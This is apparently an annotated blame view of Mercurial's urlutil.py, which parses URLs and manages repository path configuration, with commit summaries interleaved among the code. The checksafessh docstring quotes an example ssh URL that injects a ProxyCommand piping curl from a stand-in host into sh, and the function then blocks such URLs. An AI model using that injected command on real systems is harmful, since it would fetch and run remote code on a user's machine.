##// END OF EJS Templates
sparse: reliably avoid writing to store without a lock...
sparse: reliably avoid writing to store without a lock With the code as written before this patch we can still end up writing to store in `debugsparse`. Obviously we'll write to it if by accident a store requirement is modified, but more importantly we write to it if another concurrent transaction modifies the requirements file on disk. We can't rule this out since we're not holding the store lock, so it's better to explicitly pass a permission to write instead of inferring it based on file contents.

File last commit:

r52563:a09435c0 default
r52699:95cdc01f default
Show More
urlutil.py
971 lines | 30.3 KiB | text/x-python | PythonLexer
urlutil: extract `path` related code into a new module...
r47668 # utils.urlutil - code related to [paths] management
#
Matt Harbison
copyright: update to 2023
r50725 # Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others
urlutil: extract `path` related code into a new module...
r47668 #
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import os
urlutil: extract `url` related code from `util` into the new module...
r47669 import re as remod
import socket
urlutil: extract `path` related code into a new module...
r47668
pytype: import typing directly...
r52178 from typing import (
Matt Harbison
typing: add a few type hints to `mercurial/utils/urlutil.py`...
r52563 Callable,
Dict,
Tuple,
pytype: import typing directly...
r52178 Union,
)
urlutil: extract `path` related code into a new module...
r47668 from ..i18n import _
from .. import (
urlutil: extract `url` related code from `util` into the new module...
r47669 encoding,
urlutil: extract `path` related code into a new module...
r47668 error,
pycompat,
urlutil: extract `url` related code from `util` into the new module...
r47669 urllibcompat,
urlutil: extract `path` related code into a new module...
r47668 )
multi-urls: add a boolean suboption that unlock path specification as list...
r48047 from . import (
stringutil,
)
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661 from ..revlogutils import (
constants as revlog_constants,
)
pytype: import typing directly...
r52178 # keeps pyflakes happy
Matt Harbison
typing: add a few type hints to `mercurial/utils/urlutil.py`...
r52563 assert [Callable, Dict, Tuple, Union]
urlutil: extract `url` related code from `util` into the new module...
r47669
urlreq = urllibcompat.urlreq
pytype: move some type comment to proper annotation...
r52180 def getport(port: Union[bytes, int]) -> int:
urlutil: extract `url` related code from `util` into the new module...
r47669 """Return the port for a given network service.
If port is an integer, it's returned as is. If it's a string, it's
looked up using socket.getservbyname(). If there's no matching
service, error.Abort is raised.
"""
try:
return int(port)
except ValueError:
pass
try:
return socket.getservbyname(pycompat.sysstr(port))
except socket.error:
raise error.Abort(
_(b"no port number associated with service '%s'") % port
)
Gregory Szorc
py3: use class X: instead of class X(object):...
r49801 class url:
urlutil: extract `url` related code from `util` into the new module...
r47669 r"""Reliable URL parser.
This parses URLs and provides attributes for the following
components:
<scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
Missing components are set to None. The only exception is
fragment, which is set to '' if present but empty.
If parsefragment is False, fragment is included in query. If
parsequery is False, query is included in path. If both are
False, both fragment and query are included in path.
See http://www.ietf.org/rfc/rfc2396.txt for more information.
Note that for backward compatibility reasons, bundle URLs do not
take host names. That means 'bundle://../' has a path of '../'.
Examples:
>>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
<url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
>>> url(b'ssh://[::1]:2200//home/joe/repo')
<url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
>>> url(b'file:///home/joe/repo')
<url scheme: 'file', path: '/home/joe/repo'>
>>> url(b'file:///c:/temp/foo/')
<url scheme: 'file', path: 'c:/temp/foo/'>
>>> url(b'bundle:foo')
<url scheme: 'bundle', path: 'foo'>
>>> url(b'bundle://../foo')
<url scheme: 'bundle', path: '../foo'>
>>> url(br'c:\foo\bar')
<url path: 'c:\\foo\\bar'>
>>> url(br'\\blah\blah\blah')
<url path: '\\\\blah\\blah\\blah'>
>>> url(br'\\blah\blah\blah#baz')
<url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
>>> url(br'file:///C:\users\me')
<url scheme: 'file', path: 'C:\\users\\me'>
Authentication credentials:
>>> url(b'ssh://joe:xyz@x/repo')
<url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
>>> url(b'ssh://joe@x/repo')
<url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
Query strings and fragments:
>>> url(b'http://host/a?b#c')
<url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
>>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
<url scheme: 'http', host: 'host', path: 'a?b#c'>
Empty path:
>>> url(b'')
<url path: ''>
>>> url(b'#a')
<url path: '', fragment: 'a'>
>>> url(b'http://host/')
<url scheme: 'http', host: 'host', path: ''>
>>> url(b'http://host/#a')
<url scheme: 'http', host: 'host', path: '', fragment: 'a'>
Only scheme:
>>> url(b'http:')
<url scheme: 'http'>
"""
_safechars = b"!~*'()+"
_safepchars = b"/!~*'()+:\\"
_matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
pytype: move some type comment to proper annotation...
r52180 def __init__(
self,
path: bytes,
parsequery: bool = True,
parsefragment: bool = True,
) -> None:
urlutil: extract `url` related code from `util` into the new module...
r47669 # We slowly chomp away at path until we have only the path left
self.scheme = self.user = self.passwd = self.host = None
self.port = self.path = self.query = self.fragment = None
self._localpath = True
self._hostport = b''
self._origpath = path
if parsefragment and b'#' in path:
path, self.fragment = path.split(b'#', 1)
# special case for Windows drive letters and UNC paths
if hasdriveletter(path) or path.startswith(b'\\\\'):
self.path = path
return
# For compatibility reasons, we can't handle bundle paths as
# normal URLS
if path.startswith(b'bundle:'):
self.scheme = b'bundle'
path = path[7:]
if path.startswith(b'//'):
path = path[2:]
self.path = path
return
if self._matchscheme(path):
parts = path.split(b':', 1)
if parts[0]:
self.scheme, path = parts
self._localpath = False
if not path:
path = None
if self._localpath:
self.path = b''
return
else:
if self._localpath:
self.path = path
return
if parsequery and b'?' in path:
path, self.query = path.split(b'?', 1)
if not path:
path = None
if not self.query:
self.query = None
# // is required to specify a host/authority
if path and path.startswith(b'//'):
parts = path[2:].split(b'/', 1)
if len(parts) > 1:
self.host, path = parts
else:
self.host = parts[0]
path = None
if not self.host:
self.host = None
# path of file:///d is /d
# path of file:///d:/ is d:/, not /d:/
if path and not hasdriveletter(path):
path = b'/' + path
if self.host and b'@' in self.host:
self.user, self.host = self.host.rsplit(b'@', 1)
if b':' in self.user:
self.user, self.passwd = self.user.split(b':', 1)
if not self.host:
self.host = None
# Don't split on colons in IPv6 addresses without ports
if (
self.host
and b':' in self.host
and not (
self.host.startswith(b'[') and self.host.endswith(b']')
)
):
self._hostport = self.host
self.host, self.port = self.host.rsplit(b':', 1)
if not self.host:
self.host = None
if (
self.host
and self.scheme == b'file'
and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
):
raise error.Abort(
_(b'file:// URLs can only refer to localhost')
)
self.path = path
# leave the query string escaped
safehasattr: pass attribute name as string instead of bytes...
r51508 for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'):
urlutil: extract `url` related code from `util` into the new module...
r47669 v = getattr(self, a)
if v is not None:
setattr(self, a, urlreq.unquote(v))
def copy(self):
u = url(b'temporary useless value')
u.path = self.path
u.scheme = self.scheme
u.user = self.user
u.passwd = self.passwd
u.host = self.host
path: fix `url.copy` dropping the port...
r50653 u.port = self.port
urlutil: extract `url` related code from `util` into the new module...
r47669 u.query = self.query
u.fragment = self.fragment
u._localpath = self._localpath
u._hostport = self._hostport
u._origpath = self._origpath
return u
@encoding.strmethod
def __repr__(self):
attrs = []
for a in (
remotefilelog: use sysstr to access for attributes...
r51790 'scheme',
'user',
'passwd',
'host',
'port',
'path',
'query',
'fragment',
urlutil: extract `url` related code from `util` into the new module...
r47669 ):
v = getattr(self, a)
if v is not None:
remotefilelog: use sysstr to access for attributes...
r51790 line = b'%s: %r'
line %= (pycompat.bytestr(a), pycompat.bytestr(v))
attrs.append(line)
urlutil: extract `url` related code from `util` into the new module...
r47669 return b'<url %s>' % b', '.join(attrs)
def __bytes__(self):
r"""Join the URL's components back into a URL string.
Examples:
>>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
>>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
'http://user:pw@host:80/?foo=bar&baz=42'
>>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
'http://user:pw@host:80/?foo=bar%3dbaz'
>>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
'ssh://user:pw@[::1]:2200//home/joe#'
>>> bytes(url(b'http://localhost:80//'))
'http://localhost:80//'
>>> bytes(url(b'http://localhost:80/'))
'http://localhost:80/'
>>> bytes(url(b'http://localhost:80'))
'http://localhost:80/'
>>> bytes(url(b'bundle:foo'))
'bundle:foo'
>>> bytes(url(b'bundle://../foo'))
'bundle:../foo'
>>> bytes(url(b'path'))
'path'
>>> bytes(url(b'file:///tmp/foo/bar'))
'file:///tmp/foo/bar'
>>> bytes(url(b'file:///c:/tmp/foo/bar'))
'file:///c:/tmp/foo/bar'
>>> print(url(br'bundle:foo\bar'))
bundle:foo\bar
>>> print(url(br'file:///D:\data\hg'))
file:///D:\data\hg
"""
if self._localpath:
s = self.path
if self.scheme == b'bundle':
s = b'bundle:' + s
if self.fragment:
s += b'#' + self.fragment
return s
s = self.scheme + b':'
if self.user or self.passwd or self.host:
s += b'//'
elif self.scheme and (
not self.path
or self.path.startswith(b'/')
or hasdriveletter(self.path)
):
s += b'//'
if hasdriveletter(self.path):
s += b'/'
if self.user:
s += urlreq.quote(self.user, safe=self._safechars)
if self.passwd:
s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
if self.user or self.passwd:
s += b'@'
if self.host:
if not (self.host.startswith(b'[') and self.host.endswith(b']')):
s += urlreq.quote(self.host)
else:
s += self.host
if self.port:
s += b':' + urlreq.quote(self.port)
if self.host:
s += b'/'
if self.path:
# TODO: similar to the query string, we should not unescape the
# path when we store it, the path might contain '%2f' = '/',
# which we should *not* escape.
s += urlreq.quote(self.path, safe=self._safepchars)
if self.query:
# we store the query in escaped form.
s += b'?' + self.query
if self.fragment is not None:
s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
return s
__str__ = encoding.strmethod(__bytes__)
def authinfo(self):
user, passwd = self.user, self.passwd
try:
self.user, self.passwd = None, None
s = bytes(self)
finally:
self.user, self.passwd = user, passwd
if not self.user:
return (s, None)
# authinfo[1] is passed to urllib2 password manager, and its
# URIs must not contain credentials. The host is passed in the
# URIs list because Python < 2.4.3 uses only that to search for
# a password.
return (s, (None, (s, self.host), self.user, self.passwd or b''))
def isabs(self):
if self.scheme and self.scheme != b'file':
return True # remote URL
if hasdriveletter(self.path):
return True # absolute for our purposes - can't be joined()
if self.path.startswith(br'\\'):
return True # Windows UNC path
if self.path.startswith(b'/'):
return True # POSIX-style
return False
pytype: move some type comment to proper annotation...
r52180 def localpath(self) -> bytes:
urlutil: extract `url` related code from `util` into the new module...
r47669 if self.scheme == b'file' or self.scheme == b'bundle':
path = self.path or b'/'
# For Windows, we need to promote hosts containing drive
# letters to paths with drive letters.
if hasdriveletter(self._hostport):
path = self._hostport + b'/' + self.path
elif (
self.host is not None and self.path and not hasdriveletter(path)
):
path = b'/' + path
return path
return self._origpath
def islocal(self):
'''whether localpath will return something that posixfile can open'''
return (
not self.scheme
or self.scheme == b'file'
or self.scheme == b'bundle'
)
pytype: move some type comment to proper annotation...
r52180 def hasscheme(path: bytes) -> bool:
urlutil: extract `url` related code from `util` into the new module...
r47669 return bool(url(path).scheme) # cast to help pytype
pytype: move some type comment to proper annotation...
r52180 def hasdriveletter(path: bytes) -> bool:
urlutil: extract `url` related code from `util` into the new module...
r47669 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
pytype: move some type comment to proper annotation...
r52180 def urllocalpath(path: bytes) -> bytes:
urlutil: extract `url` related code from `util` into the new module...
r47669 return url(path, parsequery=False, parsefragment=False).localpath()
pytype: move some type comment to proper annotation...
r52180 def checksafessh(path: bytes) -> None:
urlutil: extract `url` related code from `util` into the new module...
r47669 """check if a path / url is a potentially unsafe ssh exploit (SEC)
This is a sanity check for ssh urls. ssh will parse the first item as
an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
Let's prevent these potentially exploited urls entirely and warn the
user.
Raises an error.Abort when the url is unsafe.
"""
path = urlreq.unquote(path)
if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
raise error.Abort(
_(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
)
pytype: move some type comment to proper annotation...
r52180 def hidepassword(u: bytes) -> bytes:
urlutil: extract `url` related code from `util` into the new module...
r47669 '''hide user credential in a url string'''
u = url(u)
if u.passwd:
u.passwd = b'***'
return bytes(u)
pytype: move some type comment to proper annotation...
r52180 def removeauth(u: bytes) -> bytes:
urlutil: extract `url` related code from `util` into the new module...
r47669 '''remove all authentication information from a url string'''
u = url(u)
u.user = u.passwd = None
return bytes(u)
urlutil: introduce a new `list_paths` function...
r47804 def list_paths(ui, target_path=None):
"""list all the (name, paths) in the passed ui"""
urlutil: make `paths` class old list of `path`...
r47958 result = []
urlutil: introduce a new `list_paths` function...
r47804 if target_path is None:
Gregory Szorc
global: bulk replace simple pycompat.iteritems(x) with x.items()...
r49768 for name, paths in sorted(ui.paths.items()):
urlutil: make `paths` class old list of `path`...
r47958 for p in paths:
result.append((name, p))
urlutil: introduce a new `list_paths` function...
r47804 else:
urlutil: make `paths` class old list of `path`...
r47958 for path in ui.paths.get(target_path, []):
result.append((target_path, path))
return result
urlutil: introduce a new `list_paths` function...
r47804
url_util: introduce a `try_path` function...
r47801 def try_path(ui, url):
"""try to build a path from a url
Return None if no Path could built.
"""
try:
# we pass the ui instance are warning might need to be issued
return path(ui, None, rawloc=url)
except ValueError:
return None
urlutil: add a `get_push_paths` to perform the push destination logic...
r47671 def get_push_paths(repo, ui, dests):
"""yields all the `path` selected as push destination by `dests`"""
if not dests:
push-dests: rework the handling of default value...
r47678 if b'default-push' in ui.paths:
urlutil: make `paths` class old list of `path`...
r47958 for p in ui.paths[b'default-push']:
path: have `get_push_paths` directly return the push variants...
r50592 yield p.get_push_variant()
push-dests: rework the handling of default value...
r47678 elif b'default' in ui.paths:
urlutil: make `paths` class old list of `path`...
r47958 for p in ui.paths[b'default']:
path: have `get_push_paths` directly return the push variants...
r50592 yield p.get_push_variant()
push-dests: rework the handling of default value...
r47678 else:
push-dests: move the code around missing default dest inside `get_push_paths`...
r47679 raise error.ConfigError(
_(b'default repository not configured!'),
hint=_(b"see 'hg help config.paths'"),
)
push-dests: rework the handling of default value...
r47678 else:
for dest in dests:
urlutil: inline the relevant part of `getpath` in `get_push_paths`...
r47802 if dest in ui.paths:
urlutil: make `paths` class old list of `path`...
r47958 for p in ui.paths[dest]:
path: have `get_push_paths` directly return the push variants...
r50592 yield p.get_push_variant()
urlutil: inline the relevant part of `getpath` in `get_push_paths`...
r47802 else:
path = try_path(ui, dest)
if path is None:
msg = _(b'repository %s does not exist')
msg %= dest
raise error.RepoError(msg)
path: have `get_push_paths` directly return the push variants...
r50592 yield path.get_push_variant()
urlutil: add a `get_push_paths` to perform the push destination logic...
r47671
path: return path instance directly from get_pull_paths...
r49054 def get_pull_paths(repo, ui, sources):
urlutil: add a `get_pull_paths` to perform the pull destination logic...
r47672 """yields all the `(path, branch)` selected as pull source by `sources`"""
if not sources:
sources = [b'default']
for source in sources:
urlutil: remove usage of `ui.expandpath` in `get_pull_paths`...
r47724 if source in ui.paths:
urlutil: make `paths` class old list of `path`...
r47958 for p in ui.paths[source]:
path: return path instance directly from get_pull_paths...
r49054 yield p
urlutil: remove usage of `ui.expandpath` in `get_pull_paths`...
r47724 else:
path: unify path creation in `get_pull_paths`...
r49053 p = path(ui, None, source, validate_path=False)
path: return path instance directly from get_pull_paths...
r49054 yield p
urlutil: add a `get_pull_paths` to perform the pull destination logic...
r47672
urlutil: add a new `get_unique_push_path`...
r47702 def get_unique_push_path(action, repo, ui, dest=None):
"""return a unique `path` or abort if multiple are found
This is useful for command and action that does not support multiple
destination (yet).
The `action` parameter will be used for the error message.
"""
if dest is None:
dests = []
else:
dests = [dest]
dests = list(get_push_paths(repo, ui, dests))
urlutil: make `paths` class old list of `path`...
r47958 if len(dests) != 1:
if dest is None:
Matt Harbison
urlutil: byteify several localized messages...
r48204 msg = _(
b"default path points to %d urls while %s only supports one"
)
urlutil: make `paths` class old list of `path`...
r47958 msg %= (len(dests), action)
else:
Matt Harbison
urlutil: byteify several localized messages...
r48204 msg = _(b"path points to %d urls while %s only supports one: %s")
urlutil: make `paths` class old list of `path`...
r47958 msg %= (len(dests), action, dest)
raise error.Abort(msg)
urlutil: add a new `get_unique_push_path`...
r47702 return dests[0]
path: introduce a `get_unique_pull_path_obj` function...
r50617 def get_unique_pull_path_obj(action, ui, source=None):
urlutil: add a new `get_unique_pull_path`...
r47698 """return a unique `(path, branch)` or abort if multiple are found
This is useful for command and action that does not support multiple
destination (yet).
The `action` parameter will be used for the error message.
path: introduce a `get_unique_pull_path_obj` function...
r50617 note: Ideally, this function would be called `get_unique_pull_path` to
mirror the `get_unique_push_path`, but the name was already taken.
urlutil: add a new `get_unique_pull_path`...
r47698 """
path: simplify the `get_unique_pull_path` function...
r50616 sources = []
if source is not None:
sources.append(source)
path: introduce a `get_unique_pull_path_obj` function...
r50617 pull_paths = list(get_pull_paths(None, ui, sources=sources))
path: simplify the `get_unique_pull_path` function...
r50616 path_count = len(pull_paths)
if path_count != 1:
urlutil: make `paths` class old list of `path`...
r47958 if source is None:
Matt Harbison
urlutil: byteify several localized messages...
r48204 msg = _(
b"default path points to %d urls while %s only supports one"
)
path: simplify the `get_unique_pull_path` function...
r50616 msg %= (path_count, action)
urlutil: make `paths` class old list of `path`...
r47958 else:
Matt Harbison
urlutil: byteify several localized messages...
r48204 msg = _(b"path points to %d urls while %s only supports one: %s")
path: simplify the `get_unique_pull_path` function...
r50616 msg %= (path_count, action, source)
urlutil: make `paths` class old list of `path`...
r47958 raise error.Abort(msg)
path: introduce a `get_unique_pull_path_obj` function...
r50617 return pull_paths[0]
def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
"""return a unique `(url, branch)` or abort if multiple are found
See `get_unique_pull_path_obj` for details.
"""
path = get_unique_pull_path_obj(action, ui, source=source)
return parseurl(path.rawloc, default_branches)
urlutil: add a new `get_unique_pull_path`...
r47698
path: add a `get_clone_path_obj` function...
r50635 def get_clone_path_obj(ui, source):
"""return the `(origsource, url, branch)` selected as clone source"""
if source == b'':
return None
return get_unique_pull_path_obj(b'clone', ui, source=source)
path: simplify the implementation of `get_clone_path`...
r50634 def get_clone_path(ui, source, default_branches=None):
path: clarify document of `get_clone_path`...
r50633 """return the `(origsource, url, branch)` selected as clone source"""
path: add a `get_clone_path_obj` function...
r50635 path = get_clone_path_obj(ui, source)
if path is None:
return (b'', b'', (None, default_branches))
path: simplify the implementation of `get_clone_path`...
r50634 if default_branches is None:
default_branches = []
branches = (path.branch, default_branches)
return path.rawloc, path.loc, branches
urlutil: add a `get_clone_path` function...
r47696
urlutil: extract `parseurl` from `hg` into the new module...
r47670 def parseurl(path, branches=None):
'''parse url#branch, returning (url, (branch, branches))'''
u = url(path)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
return bytes(u), (branch, branches or [])
urlutil: extract `path` related code into a new module...
r47668 class paths(dict):
"""Represents a collection of paths and their configs.
Data is initially derived from ui instances and the config files they have
loaded.
"""
def __init__(self, ui):
dict.__init__(self)
urlutil: move url "fixing" at the time of `ui.paths` initialization...
r48046 home_path = os.path.expanduser(b'~')
multi-urls: add a boolean suboption that unlock path specification as list...
r48047 for name, value in ui.configitems(b'paths', ignoresub=True):
urlutil: extract `path` related code into a new module...
r47668 # No location is the same as not existing.
multi-urls: add a boolean suboption that unlock path specification as list...
r48047 if not value:
urlutil: extract `path` related code into a new module...
r47668 continue
urlutil: move url "fixing" at the time of `ui.paths` initialization...
r48046 _value, sub_opts = ui.configsuboptions(b'paths', name)
s = ui.configsource(b'paths', name)
multi-urls: add a boolean suboption that unlock path specification as list...
r48047 root_key = (name, value, s)
urlutil: move url "fixing" at the time of `ui.paths` initialization...
r48046 root = ui._path_to_root.get(root_key, home_path)
multi-urls: add a boolean suboption that unlock path specification as list...
r48047
multi_url = sub_opts.get(b'multi-urls')
if multi_url is not None and stringutil.parsebool(multi_url):
base_locs = stringutil.parselist(value)
else:
base_locs = [value]
paths = []
for loc in base_locs:
loc = os.path.expandvars(loc)
loc = os.path.expanduser(loc)
if not hasscheme(loc) and not os.path.isabs(loc):
loc = os.path.normpath(os.path.join(root, loc))
p = path(ui, name, rawloc=loc, suboptions=sub_opts)
paths.append(p)
self[name] = paths
urlutil: extract `path` related code into a new module...
r47668
urlutil: make `paths` class old list of `path`...
r47958 for name, old_paths in sorted(self.items()):
new_paths = []
for p in old_paths:
new_paths.extend(_chain_path(p, ui, self))
self[name] = new_paths
urlutil: extract `path` related code into a new module...
r47668
Matt Harbison
typing: add a few type hints to `mercurial/utils/urlutil.py`...
r52563 _pathsuboptions: "Dict[bytes, Tuple[str, Callable]]" = {}
paths: add an argument to format the suboption display...
r51585 # a dictionnary of methods that can be used to format a sub-option value
path_suboptions_display = {}
urlutil: extract `path` related code into a new module...
r47668
Matt Harbison
typing: add a few type hints to `mercurial/utils/urlutil.py`...
r52563 def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr):
urlutil: extract `path` related code into a new module...
r47668 """Decorator used to declare a path sub-option.
Arguments are the sub-option name and the attribute it should set on
``path`` instances.
The decorated function will receive as arguments a ``ui`` instance,
``path`` instance, and the string value of this option from the config.
The function should return the value that will be set on the ``path``
instance.
paths: add an argument to format the suboption display...
r51585 The optional `display` argument is a function that can be used to format
the value when displayed to the user (like in `hg paths` for example).
urlutil: extract `path` related code into a new module...
r47668 This decorator can be used to perform additional verification of
sub-options and to change the type of sub-options.
"""
path-suboption: deprecated specifying the attributes as bytes...
r51802 if isinstance(attr, bytes):
msg = b'pathsuboption take `str` as "attr" argument, not `bytes`'
cleanup: turn `pathsuboption` deprecation warning into an error...
r52031 raise TypeError(msg)
urlutil: extract `path` related code into a new module...
r47668
def register(func):
_pathsuboptions[option] = (attr, func)
paths: add an argument to format the suboption display...
r51585 path_suboptions_display[option] = display
urlutil: extract `path` related code into a new module...
r47668 return func
return register
path: use the next `display` argument to deal with boolean...
r51587 def display_bool(value):
"""display a boolean suboption back to the user"""
return b'yes' if value else b'no'
path-suboption: use str for "_pushloc" suboptions...
r51801 @pathsuboption(b'pushurl', '_pushloc')
urlutil: extract `path` related code into a new module...
r47668 def pushurlpathoption(ui, path, value):
urlutil: extract `url` related code from `util` into the new module...
r47669 u = url(value)
urlutil: extract `path` related code into a new module...
r47668 # Actually require a URL.
if not u.scheme:
urlutil: provide some information about "bad url" when processing `pushurl`...
r48050 msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n')
msg %= (path.name, value)
ui.warn(msg)
urlutil: extract `path` related code into a new module...
r47668 return None
# Don't support the #foo syntax in the push URL to declare branch to
# push.
if u.fragment:
ui.warn(
_(
b'("#fragment" in paths.%s:pushurl not supported; '
b'ignoring)\n'
)
% path.name
)
u.fragment = None
return bytes(u)
path-suboption: use str for "pushrev" suboptions...
r51800 @pathsuboption(b'pushrev', 'pushrev')
urlutil: extract `path` related code into a new module...
r47668 def pushrevpathoption(ui, path, value):
return value
bookmarks: move the `mirror` option to the `paths` section...
r49056 SUPPORTED_BOOKMARKS_MODES = {
b'default',
b'mirror',
bookmarks: add a `ignore` variant of the bookmark mode...
r49058 b'ignore',
bookmarks: move the `mirror` option to the `paths` section...
r49056 }
path-suboption: use str for "bookmarks_mode" suboptions...
r51799 @pathsuboption(b'bookmarks.mode', 'bookmarks_mode')
bookmarks: move the `mirror` option to the `paths` section...
r49056 def bookmarks_mode_option(ui, path, value):
if value not in SUPPORTED_BOOKMARKS_MODES:
path_name = path.name
if path_name is None:
# this is an "anonymous" path, config comes from the global one
path_name = b'*'
msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n')
msg %= (path_name, value)
ui.warn(msg)
if value == b'default':
value = None
return value
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661 DELTA_REUSE_POLICIES = {
b'default': None,
b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY,
b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO,
delta-find: add a delta-reuse policy that blindly accepts incoming deltas...
r50662 b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE,
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661 }
path: display proper user facing value for pulled-delta-reuse-policy...
r51586 DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items())
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661
path: display proper user facing value for pulled-delta-reuse-policy...
r51586 @pathsuboption(
b'pulled-delta-reuse-policy',
path-suboption: use str for "delta_reuse_policy" suboptions...
r51798 'delta_reuse_policy',
path: display proper user facing value for pulled-delta-reuse-policy...
r51586 display=DELTA_REUSE_POLICIES_NAME.get,
)
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661 def delta_reuse_policy(ui, path, value):
if value not in DELTA_REUSE_POLICIES:
path_name = path.name
if path_name is None:
# this is an "anonymous" path, config comes from the global one
path_name = b'*'
delta-find: rename `delta-reuse-policy` to `pulled-delta-reuse-policy`...
r51102 msg = _(
b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n'
)
delta-find: add a `delta-reuse-policy` on configuration `path`...
r50661 msg %= (path_name, value)
ui.warn(msg)
return DELTA_REUSE_POLICIES.get(value)
path-suboption: use str for "multi_urls" path suboptions...
r51797 @pathsuboption(b'multi-urls', 'multi_urls', display=display_bool)
multi-urls: add a boolean suboption that unlock path specification as list...
r48047 def multiurls_pathoption(ui, path, value):
res = stringutil.parsebool(value)
if res is None:
ui.warn(
_(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name
)
res = False
return res
urlutil: make `paths` class old list of `path`...
r47958 def _chain_path(base_path, ui, paths):
urlutil: extract `chain_path` in a function...
r47957 """return the result of "path://" logic applied on a given path"""
urlutil: make `paths` class old list of `path`...
r47958 new_paths = []
if base_path.url.scheme != b'path':
new_paths.append(base_path)
else:
assert base_path.url.path is None
sub_paths = paths.get(base_path.url.host)
if sub_paths is None:
urlutil: extract `chain_path` in a function...
r47957 m = _(b'cannot use `%s`, "%s" is not a known path')
urlutil: make `paths` class old list of `path`...
r47958 m %= (base_path.rawloc, base_path.url.host)
urlutil: extract `chain_path` in a function...
r47957 raise error.Abort(m)
urlutil: make `paths` class old list of `path`...
r47958 for subpath in sub_paths:
path = base_path.copy()
if subpath.raw_url.scheme == b'path':
m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
m %= (path.rawloc, path.url.host)
raise error.Abort(m)
path.url = subpath.url
path.rawloc = subpath.rawloc
path.loc = subpath.loc
if path.branch is None:
path.branch = subpath.branch
else:
base = path.rawloc.rsplit(b'#', 1)[0]
path.rawloc = b'%s#%s' % (base, path.branch)
suboptions = subpath._all_sub_opts.copy()
suboptions.update(path._own_sub_opts)
path._apply_suboptions(ui, suboptions)
new_paths.append(path)
return new_paths
urlutil: extract `chain_path` in a function...
r47957
Gregory Szorc
py3: use class X: instead of class X(object):...
r49801 class path:
urlutil: extract `path` related code into a new module...
r47668 """Represents an individual path and its configuration."""
path: add a new argument to control path validation...
r49052 def __init__(
self,
ui=None,
name=None,
rawloc=None,
suboptions=None,
validate_path=True,
):
urlutil: extract `path` related code into a new module...
r47668 """Construct a path from its config options.
``ui`` is the ``ui`` instance the path is coming from.
``name`` is the symbolic name of the path.
``rawloc`` is the raw location, as defined in the config.
path: deprecated the `pushloc` attribute...
r50601 ``_pushloc`` is the raw locations pushes should be made to.
(see the `get_push_variant` method)
urlutil: extract `path` related code into a new module...
r47668
If ``name`` is not defined, we require that the location be a) a local
filesystem path with a .hg directory or b) a URL. If not,
``ValueError`` is raised.
"""
urlutil: add a `copy` method to `path...
r47956 if ui is None:
# used in copy
assert name is None
assert rawloc is None
assert suboptions is None
return
urlutil: extract `path` related code into a new module...
r47668 if not rawloc:
raise ValueError(b'rawloc must be defined')
path: move the url parsing and related attribute setting to a method...
r50590 self.name = name
urlutil: extract `path` related code into a new module...
r47668
path: move the url parsing and related attribute setting to a method...
r50590 # set by path variant to point to their "non-push" version
path: add a method to retrieve a "push variant" of a path...
r50591 self.main_path = None
path: move the url parsing and related attribute setting to a method...
r50590 self._setup_url(rawloc)
urlutil: extract `path` related code into a new module...
r47668
path: add a new argument to control path validation...
r49052 if validate_path:
self._validate_path()
urlutil: extract `path` related code into a new module...
r47668
_path, sub_opts = ui.configsuboptions(b'paths', b'*')
self._own_sub_opts = {}
if suboptions is not None:
self._own_sub_opts = suboptions.copy()
sub_opts.update(suboptions)
self._all_sub_opts = sub_opts.copy()
self._apply_suboptions(ui, sub_opts)
path: move the url parsing and related attribute setting to a method...
r50590 def _setup_url(self, rawloc):
urlutil: extract `path` related code into a new module...
r47668 # Locations may define branches via syntax <base>#<branch>.
urlutil: extract `url` related code from `util` into the new module...
r47669 u = url(rawloc)
urlutil: extract `path` related code into a new module...
r47668 branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
self.url = u
# the url from the config/command line before dealing with `path://`
self.raw_url = u.copy()
self.branch = branch
self.rawloc = rawloc
self.loc = b'%s' % u
path: allow to copy a path while adjusting the url...
r50651 def copy(self, new_raw_location=None):
"""make a copy of this path object
When `new_raw_location` is set, the new path will point to it.
This is used by the scheme extension so expand the scheme.
"""
urlutil: add a `copy` method to `path...
r47956 new = self.__class__()
for k, v in self.__dict__.items():
new_copy = getattr(v, 'copy', None)
